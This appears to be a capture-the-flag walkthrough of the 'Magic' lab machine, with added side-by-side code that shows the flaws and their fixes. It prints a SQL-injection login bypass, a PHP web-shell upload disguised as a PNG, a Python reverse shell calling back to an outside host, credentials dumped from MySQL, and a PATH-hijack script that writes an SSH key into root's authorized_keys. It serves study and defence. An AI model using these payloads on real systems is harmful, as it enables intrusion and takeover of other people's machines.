Enumeration

  1. Only two ports are open:
nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185

# Nmap 7.80 scan initiated Sat Apr 18 22:30:30 2020 as: nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
Warning: 10.10.10.185 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.185
Host is up (0.048s latency).
Not shown: 971 closed ports, 27 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:30:44 2020 -- 1 IP address (1 host up) scanned in 14.23 seconds
  2. The page at http://10.10.10.185 shows an image catalog. It also mentions that you need to log in to upload images.

  3. Images are served from a static folder, e.g. http://10.10.10.185/images/uploads/*.jpeg

  4. Scanning the box with gobuster discovered a few other pages:

gobuster dir -u http://10.10.10.185/ -x php -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 200 -o initial-gobuster-scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        200
[+] Wordlist:       /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/09/06 12:14:25 Starting gobuster
===============================================================
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)

Foothold

  1. Back to http://10.10.10.185/login.php and try SQLi:
username: ' or 1=1; -- -
password: ' or 1=1; -- -
  2. And we got in! The page redirected to http://10.10.10.185/upload.php. But trying to upload any web shell failed with the alert: “Sorry, only JPG, JPEG & PNG files are allowed.”

  3. We need to get around this. Get the PHP shell from https://github.com/jgor/php-jpeg-shell/raw/master/shell.php, rename it to shell.php.png, and the upload completes without any complaints. Nice!

  4. From the main page review we know the upload folder location: http://10.10.10.185/images/uploads/. Opening http://10.10.10.185/images/uploads/shell.php.png shows a command input ready to execute.

  5. Start a listener:

nc -lnvp 4444
  6. Execute a reverse shell from the web PHP shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  7. And we got a shell!
www-data@ubuntu:~/Magic/images/uploads$ ls -la
ls -la
total 7400
drwxr-xr-x 2 www-data www-data    4096 Apr 18 12:40 .
drwxr-xr-x 4 www-data www-data    4096 Apr 14 05:04 ..
-rw-r--r-- 1 www-data www-data 5289209 Oct 22 00:44 7.jpg
-rw-r--r-- 1 www-data www-data 1455770 Oct 22 01:02 giphy.gif
-rw-r--r-- 1 www-data www-data   25290 Apr 18 12:07 kibers.png
-rw-r--r-- 1 www-data www-data  124278 Oct 22 01:01 logo.png
-rw-r--r-- 1 www-data www-data  100328 Oct 22 01:01 magic-1424x900.jpg
-rw-r--r-- 1 www-data www-data   37787 Oct 22 01:01 magic-hat_23-2147512156.jpg
-rw-r--r-- 1 www-data www-data   71417 Apr 18 12:39 magic-stwand.jpg
-rw-r--r-- 1 www-data www-data   67973 Oct 22 01:01 magic-wand.jpg
-rw-r--r-- 1 www-data www-data       8 Apr 18 12:30 r.png
-rw-r--r-- 1 www-data www-data     192 Apr 18 12:40 shell.php.png
-rw-r--r-- 1 www-data www-data     192 Apr 18 12:23 shell.png
-rw-r--r-- 1 root     root      361568 Apr 14 04:56 trx.jpg
www-data@ubuntu:~/Magic/images/uploads$
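The two weaknesses used for the foothold, the string-built login query that the `' or 1=1; -- -` payload bypasses and an upload filter that only looks at the last extension, shown side by side with their fixed forms. This is an added example, not code from the box or from this write-up; the `login` table is a constructed SQLite stand-in with a placeholder password, and the weak/strict upload checks are assumed models of the behaviour observed, not Magic's actual upload.php.

```python
import sqlite3

# Constructed in-memory stand-in for the box's `login` table (not the real Magic DB).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES (1, 'admin', 'placeholder-password')")
    return db

def login_vulnerable(db, username, password):
    # Query built by string formatting: the leading quote in "' or 1=1; -- -"
    # closes the literal, "or 1=1" makes the WHERE clause always true and
    # "-- -" comments out the password comparison.
    sql = ("SELECT username FROM login WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Parameterised query: the payload is compared as a plain string value.
    row = db.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

# Magic bytes for the three extensions the upload form claims to allow.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}

def upload_allowed_weak(filename):
    # Looks only at the last extension, so "shell.php.png" passes.
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED

def upload_allowed_strict(filename, data):
    # Exactly one extension (rejects shell.php.png), from the allow-list,
    # and the content must start with the magic bytes for that extension.
    base, dot, ext = filename.partition(".")
    if not base or not dot or "." in ext:
        return False
    ext = ext.lower()
    return ext in ALLOWED and data.startswith(ALLOWED[ext])
```

The strict check only stops the naming trick; the upload directory must also not be served through the PHP handler, which is what let shell.php.png execute here, and storing uploads under a server-generated name removes the attacker's control over the extension entirely.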

Getting user

  1. The file /var/www/Magic/db.php5 contains MySQL credentials:
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
    // ... rest of the class omitted ...
}
  2. Using these credentials it is possible to create a MySQL dump (the password must follow -p with no space, otherwise mysqldump prompts and treats it as another database name):
mysqldump --databases Magic -u theseus -piamkingtheseus > magic.sql
  3. The SQL dump contains the admin credentials:
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
  4. Try reusing this password for the user theseus:
www-data@ubuntu:/dev/shm$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$ cat user.txt
cat user.txt
b0fdfe563dc8c153cebf91eab51166c2
theseus@ubuntu:~$ pwd
pwd
/home/theseus
theseus@ubuntu:~$ ls -la
ls -la
total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21 03:26 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21 03:25 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22 03:30 .config
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Downloads
drwx------  3 theseus theseus 4096 Oct 21 03:49 .gnupg
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------  3 theseus theseus 4096 Oct 21 03:49 .local
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Public
drwx------  2 theseus theseus 4096 Oct 21 07:31 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Templates
-r--------  1 theseus theseus   33 Apr 18 03:59 user.txt
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Videos

Privilege escalation

  1. There is a non-default SUID binary:
theseus@ubuntu:~$ ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 03:45 /bin/sysinfo
  2. And we are in the right group to run it:
theseus@ubuntu:~$ id theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
  3. Running it with ltrace revealed that the free command is called without a full path, so we can try to control which binary executes:
  • Create custom file:
theseus@ubuntu:/dev/shm$ cat free
#!/bin/sh
cat /root/root.txt
mkdir /root/.ssh
cat /home/theseus/.ssh/authorized_keys >> /root/.ssh/authorized_keys
  • Make it executable:
theseus@ubuntu:/dev/shm$ chmod +x free
  • Adjust PATH variable:
theseus@ubuntu:~$ export PATH=/dev/shm:$PATH
  4. Running sysinfo prints the root.txt hash and also appends our SSH public key to root's authorized_keys.

  5. SSH in as root:

ssh -i id_rsa.pub root@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 18 14:47:23 2020 from 10.10.14.14
root@ubuntu:~# cat root.txt
392e6cbdbbb527970f14098612325fe7
root@ubuntu:~#
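The PATH hijack behind the sysinfo escalation, modelled as an added example (not the box's binary or this write-up's code): a privileged program that invokes a bare `free` resolves it through the caller's PATH, so a planted script in a writable directory runs first, while the hardened variant resolves against a fixed trusted search path and hands the child a minimal environment. The planted `free` is a constructed stand-in that only prints a marker, and a temporary directory stands in for /dev/shm.

```python
import os
import shutil
import stat
import subprocess
import tempfile

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Constructed stand-in for the planted `free`: prints a marker instead of doing anything.
FAKE_FREE = "#!/bin/sh\necho HIJACKED\n"

def plant_fake_free(directory):
    path = os.path.join(directory, "free")
    with open(path, "w") as fh:
        fh.write(FAKE_FREE)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path

def resolve_free(env):
    # Same lookup the loader does for a bare command name: first PATH entry wins.
    return shutil.which("free", path=env.get("PATH", ""))

def run_free_vulnerable(env):
    # Mirrors the sysinfo bug: bare "free" is resolved through the caller's PATH.
    try:
        return subprocess.run(["free"], env=env, capture_output=True, text=True).stdout
    except OSError:
        return ""

def run_free_hardened():
    # Ignore the caller's PATH entirely: resolve against a fixed trusted search
    # path and pass the child a minimal environment of our own.
    exe = shutil.which("free", path=SAFE_PATH)
    if exe is None:
        return ""  # real `free` is not installed on this host
    return subprocess.run([exe], env={"PATH": SAFE_PATH},
                          capture_output=True, text=True).stdout

def demo():
    with tempfile.TemporaryDirectory() as shm:  # stands in for the writable /dev/shm
        plant_fake_free(shm)
        env = dict(os.environ, PATH=shm + ":" + SAFE_PATH)
        return ((resolve_free(env) or "").startswith(shm),
                "HIJACKED" in run_free_vulnerable(env),
                "HIJACKED" in run_free_hardened())

if __name__ == "__main__":
    print(demo())  # (True, True, False) on a host where the temp dir allows exec
```

For a native SUID binary the equivalent fix is calling the helper by absolute path (or clearing PATH before any popen/system call) and, as a general control, not shipping a root-SUID wrapper around commands that do not need root at all.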